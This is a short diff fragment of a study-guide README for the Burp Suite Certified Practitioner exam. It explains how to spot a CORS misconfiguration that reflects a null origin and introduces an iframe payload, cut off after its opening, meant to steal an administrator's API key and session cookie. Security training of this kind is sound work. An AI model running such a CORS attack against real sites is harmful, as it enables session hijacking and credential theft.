botesjuan/Burp-Suite-Certified-Practitioner-Exam-Study/README.md

 >Identify the CORS insecure configuration by checking the AJAX response if it contains the `Access-Control-Allow-Credentials`, then add header `Origin: null`.
 If the `null` origin is reflected in the `Access-Control-Allow-Origin` header it is vulnerable.

->Payload that may work in BSCP exam on getting the administrator account API and session cookie.
+>Payload that may work in BSCP exam to obtain the administrator account API and session cookie data.
 Host on exploit server.

 ```html
 <iframe sandbox="allow-scripts allow-top-navigation allow-forms" srcdoc="<script>